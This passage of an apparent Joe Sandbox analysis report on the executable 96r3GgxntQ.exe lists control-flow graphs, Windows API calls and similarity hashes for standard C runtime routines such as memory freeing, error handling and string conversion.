                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00BB3DBF
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00BB3DD2
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00BB3DE3
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00BB3DF4
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1554649372.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554631635.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554665870.0000000000BBB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554684885.0000000000BC1000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554701405.0000000000BC3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_bb0000_96r3GgxntQ.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                          • String ID: (?z
                                                                                                                                                                                                                                                          • API String ID: 776569668-554794068
                                                                                                                                                                                                                                                          • Opcode ID: faef84b0383e0ebbf8b7436884feb33075f9301f88557aec971b3fcacc1ba083
                                                                                                                                                                                                                                                          • Instruction ID: ec4a06af71cdfd1a89b58bf81b8034621153ee75d66eb8dfa4c058788cd99871
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: faef84b0383e0ebbf8b7436884feb33075f9301f88557aec971b3fcacc1ba083
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 17F0B779900260DF97516F19FC01DA93BB0FB9EB203450AA6F512B72B3CFB589518AC1

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          control_flow_graph 356 bb23d1-bb23d8 357 bb23da-bb23dc 356->357 358 bb23dd-bb23f8 GetLastError call bb26a4 356->358 361 bb23fa-bb23fc 358->361 362 bb2411-bb2413 358->362 363 bb2457-bb2462 SetLastError 361->363 364 bb23fe-bb240f call bb26df 361->364 362->363 364->362 367 bb2415-bb2425 call bb3f67 364->367 370 bb2439-bb2449 call bb26df 367->370 371 bb2427-bb2437 call bb26df 367->371 377 bb244f-bb2456 call bb3ec5 370->377 371->370 376 bb244b-bb244d 371->376 376->377 377->363
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,00BB23C8,00BB209F,00BB1AFC), ref: 00BB23DF
                                                                                                                                                                                                                                                          • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00BB23ED
                                                                                                                                                                                                                                                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00BB2406
                                                                                                                                                                                                                                                          • SetLastError.KERNEL32(00000000,00BB23C8,00BB209F,00BB1AFC), ref: 00BB2458
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1554649372.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554631635.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554665870.0000000000BBB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554684885.0000000000BC1000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554701405.0000000000BC3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_bb0000_96r3GgxntQ.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 3852720340-0
                                                                                                                                                                                                                                                          • Opcode ID: 7c5bae2c7ea88f58a43c3be7fa10c26e4e40773239b55e0d3f24b616f1518006
                                                                                                                                                                                                                                                          • Instruction ID: 86b6a0475fe88f92c6cc41db0c84ad2aa1546af866e6d97ec24fc90bb02ce64e
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7c5bae2c7ea88f58a43c3be7fa10c26e4e40773239b55e0d3f24b616f1518006
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C801F7721083155FAA2427B8BC85EF72BD4DB067F572003B9FA20926E5EFD18C819250

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          control_flow_graph 380 bb4424-bb4438 GetLastError 381 bb443a-bb4444 call bb5904 380->381 382 bb4446-bb444b 380->382 381->382 387 bb448f-bb449a SetLastError 381->387 384 bb444d call bb480c 382->384 386 bb4452-bb4458 384->386 388 bb445a 386->388 389 bb4463-bb4471 call bb595a 386->389 390 bb445b-bb4461 call bb4869 388->390 394 bb4473-bb4474 389->394 395 bb4476-bb448d call bb4296 call bb4869 389->395 398 bb449b-bb44a7 SetLastError call bb3f24 390->398 394->390 395->387 395->398
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(00000008,?,00BB6D69,?,?,?,00BC04C8,0000002C,00BB3F34,00000016,00BB209F,00BB1AFC), ref: 00BB4428
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00BB445B
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00BB4483
                                                                                                                                                                                                                                                          • SetLastError.KERNEL32(00000000), ref: 00BB4490
                                                                                                                                                                                                                                                          • SetLastError.KERNEL32(00000000), ref: 00BB449C
                                                                                                                                                                                                                                                          • _abort.LIBCMT ref: 00BB44A2
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1554649372.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554631635.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554665870.0000000000BBB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554684885.0000000000BC1000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554701405.0000000000BC3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_bb0000_96r3GgxntQ.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: ErrorLast$_free$_abort
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 3160817290-0
                                                                                                                                                                                                                                                          • Opcode ID: 1e3ac23dfb8ba5d75e11b9d77ab8edbad00f10e04401132e128bad5dc14dfb19
                                                                                                                                                                                                                                                          • Instruction ID: 0ec158417e4d26f7e266e976d39c7ae1ea354784417839e5ec90a6af53fb52e5
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1e3ac23dfb8ba5d75e11b9d77ab8edbad00f10e04401132e128bad5dc14dfb19
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 91F0C831500640ABC6227739AC59FFB26EAFBC1771B254594F528E3393EFF1C9115161

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          control_flow_graph 404 bb2f53-bb2f60 405 bb2f7e-bb2fa7 call bb522b GetModuleFileNameA 404->405 406 bb2f62-bb2f66 404->406 412 bb2fa9-bb2fac 405->412 413 bb2fae 405->413 406->405 407 bb2f68-bb2f79 call bb47f9 call bb473d 406->407 418 bb3072-bb3076 407->418 412->413 415 bb2fb0-bb2fda call bb3077 call bb31ec 412->415 413->415 422 bb2fe8-bb3005 call bb3077 415->422 423 bb2fdc-bb2fe6 call bb47f9 415->423 429 bb301d-bb3030 call bb4d46 422->429 430 bb3007-bb3014 422->430 428 bb3019-bb301b 423->428 431 bb3067-bb3071 call bb4869 428->431 436 bb3032-bb3035 429->436 437 bb3037-bb3040 429->437 430->428 431->418 438 bb305d-bb3064 call bb4869 436->438 439 bb304a-bb3057 437->439 440 bb3042-bb3048 437->440 438->431 439->438 440->439 440->440
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\96r3GgxntQ.exe,00000104), ref: 00BB2F93
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00BB305E
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00BB3068
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1554649372.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554631635.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554665870.0000000000BBB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554684885.0000000000BC1000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554701405.0000000000BC3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_bb0000_96r3GgxntQ.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: _free$FileModuleName
                                                                                                                                                                                                                                                          • String ID: C:\Users\user\Desktop\96r3GgxntQ.exe$`%y
                                                                                                                                                                                                                                                          • API String ID: 2506810119-1517768399
                                                                                                                                                                                                                                                          • Opcode ID: 11f00a483e69a36e59491900033e86afabc287e74f7f19fedb5243a4477cde61
                                                                                                                                                                                                                                                          • Instruction ID: 26b7858245be0682efc0ccec26ea1be56d8ade127e30db9382419075bb3c384f
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 11f00a483e69a36e59491900033e86afabc287e74f7f19fedb5243a4477cde61
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0E313275A00254AFDB21AB99DC81EFEBBFCEF85B10B5040A6F405A7211DBB18E45CB91

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          control_flow_graph 443 bb36fc-bb3724 GetModuleHandleExW 444 bb3749-bb374d 443->444 445 bb3726-bb3739 GetProcAddress 443->445 448 bb3758-bb3765 call bb123a 444->448 449 bb374f-bb3752 FreeLibrary 444->449 446 bb373b-bb3746 445->446 447 bb3748 445->447 446->447 447->444 449->448
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00BB36AD,?,?,00BB364D,?,00BC02E0,0000000C,00BB37A4,?,00000002), ref: 00BB371C
                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00BB372F
                                                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,?,?,?,00BB36AD,?,?,00BB364D,?,00BC02E0,0000000C,00BB37A4,?,00000002,00000000), ref: 00BB3752
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1554649372.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554631635.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554665870.0000000000BBB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554684885.0000000000BC1000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554701405.0000000000BC3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_bb0000_96r3GgxntQ.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                                          • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                                          • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                                          • Opcode ID: c90e6103df2af52474ab0b6194728c68480e81dfcc5aad42a7d5acb673dbc786
                                                                                                                                                                                                                                                          • Instruction ID: 17949034d066b11b3fc6ba3d3d110168e7d4edacb72021a7c088001239a76fd1
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c90e6103df2af52474ab0b6194728c68480e81dfcc5aad42a7d5acb673dbc786
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 88F03C71A00208BBCB11AB95DC59FFEBBF8EF08B52F4041A5E805A2160DFF49E44CA90

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          control_flow_graph 453 bb634d-bb6372 call bb3f72 456 bb637f-bb63a5 MultiByteToWideChar 453->456 457 bb6374-bb637c 453->457 458 bb63ab-bb63b7 456->458 459 bb6444-bb6448 456->459 457->456 460 bb63b9-bb63ca 458->460 461 bb6403 458->461 462 bb644a-bb644d 459->462 463 bb6454-bb6469 call bb123a 459->463 464 bb63cc-bb63db call bbac20 460->464 465 bb63e5-bb63eb 460->465 467 bb6405-bb6407 461->467 462->463 472 bb643d-bb6443 call bb646a 464->472 478 bb63dd-bb63e3 464->478 469 bb63ec call bb62ff 465->469 471 bb6409-bb642b call bb20b0 MultiByteToWideChar 467->471 467->472 475 bb63f1-bb63f6 469->475 471->472 482 bb642d-bb643b GetStringTypeW 471->482 472->459 475->472 479 bb63f8 475->479 481 bb63fe-bb6401 478->481 479->481 481->467 482->472
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,00000100,00000020,00000000,00000000,5EFC4D8B,00000100,00BB54C8,00000000,00000001,00000020,00000100,?,5EFC4D8B,00000000), ref: 00BB639A
                                                                                                                                                                                                                                                          • __alloca_probe_16.LIBCMT ref: 00BB63D2
                                                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00BB6423
                                                                                                                                                                                                                                                          • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00BB6435
                                                                                                                                                                                                                                                          • __freea.LIBCMT ref: 00BB643E
                                                                                                                                                                                                                                                            • Part of subcall function 00BB62FF: HeapAlloc.KERNEL32(00000000,?,00000004,?,00BB7E5B,?,00000000,?,00BB686F,?,00000004,00000000,?,?,?,00BB3BCD), ref: 00BB6331
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1554649372.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554631635.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554665870.0000000000BBB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554684885.0000000000BC1000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554701405.0000000000BC3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_bb0000_96r3GgxntQ.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: ByteCharMultiWide$AllocHeapStringType__alloca_probe_16__freea
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 1857427562-0
                                                                                                                                                                                                                                                          • Opcode ID: 07ed6b8a0455e1ae82e37091b393426d6d997a56e060a1113f710ceb0c6bac24
                                                                                                                                                                                                                                                          • Instruction ID: 7ef7d413acbe1a1d03a5043ffa2d43075c5ab3aa504dbd2b6aa94dae66bd904c
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 07ed6b8a0455e1ae82e37091b393426d6d997a56e060a1113f710ceb0c6bac24
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E531AD72A0061AABDB259F68DC85DFE7BE5EB00710B0441A8FC14D7250EBB9CD55CBA0

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          control_flow_graph 483 bb561e-bb5633 GetEnvironmentStringsW 484 bb568b 483->484 485 bb5635-bb5655 call bb55e7 WideCharToMultiByte 483->485 487 bb568d-bb568f 484->487 485->484 491 bb5657 485->491 489 bb5698-bb56a0 487->489 490 bb5691-bb5692 FreeEnvironmentStringsW 487->490 490->489 492 bb5658 call bb62ff 491->492 493 bb565d-bb5662 492->493 494 bb5680 493->494 495 bb5664-bb5678 WideCharToMultiByte 493->495 497 bb5682-bb5689 call bb4869 494->497 495->494 496 bb567a-bb567e 495->496 496->497 497->487
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GetEnvironmentStringsW.KERNEL32 ref: 00BB5627
                                                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00BB564A
                                                                                                                                                                                                                                                            • Part of subcall function 00BB62FF: HeapAlloc.KERNEL32(00000000,?,00000004,?,00BB7E5B,?,00000000,?,00BB686F,?,00000004,00000000,?,?,?,00BB3BCD), ref: 00BB6331
                                                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00BB5670
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00BB5683
                                                                                                                                                                                                                                                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00BB5692
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1554649372.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554631635.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554665870.0000000000BBB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554684885.0000000000BC1000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554701405.0000000000BC3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_bb0000_96r3GgxntQ.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: ByteCharEnvironmentMultiStringsWide$AllocFreeHeap_free
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 2278895681-0
                                                                                                                                                                                                                                                          • Opcode ID: 1cdb0477fdbe6327570e5d0283b005b68da2d3afb785e997bf9530c68f623113
                                                                                                                                                                                                                                                          • Instruction ID: 848bc1813e80ab3d59f7dcf68eca8fbc837b017974f47a1dc21646139fc313f3
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1cdb0477fdbe6327570e5d0283b005b68da2d3afb785e997bf9530c68f623113
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B301AC72601A557F27311A765C8DEFB6BADDEC6B61355026AF905D3140EFE08C0181B1
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,00BB47FE,00BB7E79,?,00BB686F,?,00000004,00000000,?,?,?,00BB3BCD,?,00000000), ref: 00BB44AD
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00BB44E2
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00BB4509
                                                                                                                                                                                                                                                          • SetLastError.KERNEL32(00000000,?,?,?,?,?,?), ref: 00BB4516
                                                                                                                                                                                                                                                          • SetLastError.KERNEL32(00000000,?,?,?,?,?,?), ref: 00BB451F
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1554649372.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554631635.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554665870.0000000000BBB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554684885.0000000000BC1000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554701405.0000000000BC3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_bb0000_96r3GgxntQ.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: ErrorLast$_free
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 3170660625-0
                                                                                                                                                                                                                                                          • Opcode ID: 102d0be885169d26a98c300dd752183f67d4acebb7dd3a10b0993b5badb46bd8
                                                                                                                                                                                                                                                          • Instruction ID: b02858e9d49aa1a1b286b0757108acf5fa21720950b6dd6d9c9f3394bb919e2f
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 102d0be885169d26a98c300dd752183f67d4acebb7dd3a10b0993b5badb46bd8
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6B01D136200A40AB82227B356C89FBB22EEFBD677172401A5F529A3293EFF0C9014021
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00BB618E
                                                                                                                                                                                                                                                            • Part of subcall function 00BB4869: HeapFree.KERNEL32(00000000,00000000,?,00BB620D,?,00000000,?,00000000,?,00BB6234,?,00000007,?,?,00BB669F,?), ref: 00BB487F
                                                                                                                                                                                                                                                            • Part of subcall function 00BB4869: GetLastError.KERNEL32(?,?,00BB620D,?,00000000,?,00000000,?,00BB6234,?,00000007,?,?,00BB669F,?,?), ref: 00BB4891
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00BB61A0
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00BB61B2
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00BB61C4
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00BB61D6
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1554649372.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554631635.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554665870.0000000000BBB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554684885.0000000000BC1000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554701405.0000000000BC3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_bb0000_96r3GgxntQ.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 776569668-0
                                                                                                                                                                                                                                                          • Opcode ID: 48f798f025fc0ac3d318fc6b90b447edadb2f417c1aecbbb9216e5558472e20f
                                                                                                                                                                                                                                                          • Instruction ID: 4b510ad01b7658882b6a894c0686b1da70f6f6ac8c491bd0fcc0f96d3410370f
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 48f798f025fc0ac3d318fc6b90b447edadb2f417c1aecbbb9216e5558472e20f
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 27F06232604200AF8660EF5DF981CBA77EDFA45B107581CA5F449F7593CBB4FC808690
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                            • Part of subcall function 00BB4424: GetLastError.KERNEL32(00000008,?,00BB6D69,?,?,?,00BC04C8,0000002C,00BB3F34,00000016,00BB209F,00BB1AFC), ref: 00BB4428
                                                                                                                                                                                                                                                            • Part of subcall function 00BB4424: _free.LIBCMT ref: 00BB445B
                                                                                                                                                                                                                                                            • Part of subcall function 00BB4424: SetLastError.KERNEL32(00000000), ref: 00BB449C
                                                                                                                                                                                                                                                            • Part of subcall function 00BB4424: _abort.LIBCMT ref: 00BB44A2
                                                                                                                                                                                                                                                            • Part of subcall function 00BB5249: _abort.LIBCMT ref: 00BB527B
                                                                                                                                                                                                                                                            • Part of subcall function 00BB5249: _free.LIBCMT ref: 00BB52AF
                                                                                                                                                                                                                                                            • Part of subcall function 00BB4EBE: GetOEMCP.KERNEL32(00000000,?,?,00BB5147,?), ref: 00BB4EE9
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00BB51A2
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00BB51D8
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1554649372.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554631635.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554665870.0000000000BBB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554684885.0000000000BC1000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554701405.0000000000BC3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_bb0000_96r3GgxntQ.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: _free$ErrorLast_abort
                                                                                                                                                                                                                                                          • String ID: (?z$(?z
                                                                                                                                                                                                                                                          • API String ID: 2991157371-3597695164
                                                                                                                                                                                                                                                          • Opcode ID: 1d9284a03e1bd6e3495780cb59976444354d1a79227a966d0caa4557f601baa8
                                                                                                                                                                                                                                                          • Instruction ID: 85dda8aa85e5f357ca16aaf9c9e6f4396c50ed05644c0e15a8737ac9accfb3ec
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1d9284a03e1bd6e3495780cb59976444354d1a79227a966d0caa4557f601baa8
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6431D131A00648AFDB21EBADD840BFDB7F5EF45320F2101E9E814AB292DBB19D41CB41
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00BB2594,00000000,?,00BC1B50,?,?,?,00BB2737,00000004,InitializeCriticalSectionEx,00BBBC48,InitializeCriticalSectionEx), ref: 00BB25F0
                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,00BB2594,00000000,?,00BC1B50,?,?,?,00BB2737,00000004,InitializeCriticalSectionEx,00BBBC48,InitializeCriticalSectionEx,00000000,?,00BB24C7), ref: 00BB25FA
                                                                                                                                                                                                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 00BB2622
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1554649372.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554631635.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554665870.0000000000BBB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554684885.0000000000BC1000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554701405.0000000000BC3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_bb0000_96r3GgxntQ.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                                                                          • String ID: api-ms-
                                                                                                                                                                                                                                                          • API String ID: 3177248105-2084034818
